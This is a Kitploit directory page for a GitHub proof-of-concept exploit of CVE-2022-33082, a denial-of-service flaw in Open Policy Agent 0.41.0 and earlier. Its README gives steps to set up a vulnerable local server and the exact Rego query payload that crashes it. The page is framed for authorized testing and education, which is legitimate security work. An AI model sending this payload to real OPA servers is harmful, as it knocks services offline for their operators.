Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2022-33082-exploit — Proof-of-concept exploit for CVE-2022-33082 causing denial of service in Open Policy Agent versions ≤0.41.0 via crafted input. Intended for authorized testing and educational use. | Kitploit
Tools/GitHubGitHub/cyberqueenmeg/cve-2022-33082-exploit
Vulnerability AnalysisExploitationWeb SecurityLearning & Education
GitHubcyberqueenmeg/cve-2022-33082-exploit

cve-2022-33082-exploit

Proof-of-concept exploit for CVE-2022-33082 causing denial of service in Open Policy Agent versions ≤0.41.0 via crafted input. Intended for authorized testing and educational use.

View Repository
113 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE 2022-33082 Exploit

DISCLAMER

This code is provided for ETHICAL purposes - understanding the vulnerability and testing one's own systems or AUTHORIZED systems. By using this, you agree to act ethically and I hold no liability if you do not act ethically.

This exploit works on Open Policy Agent (OPA) versions 0.41.0 and lower. Install an OPA instance on Linux to test with this command:

curl -L -o opa https://openpolicyagent.org/downloads/v0.41.0/opa_linux_amd64_static

chmod +x opa

./opa run --server

Then, navigate to localhost:8181 on your web browser. Input the below into the respective fields

query field (go code): p := [input() | input := 1]

{ "input":"put this in the input (json) field!" }

The website will then crash and the terminal runing the server will report a kernel panic

Implications

Anyone with web access to an OPA server version 0.41.0 or lower can completely crash the server. This server is not password protected by default.

Download Tool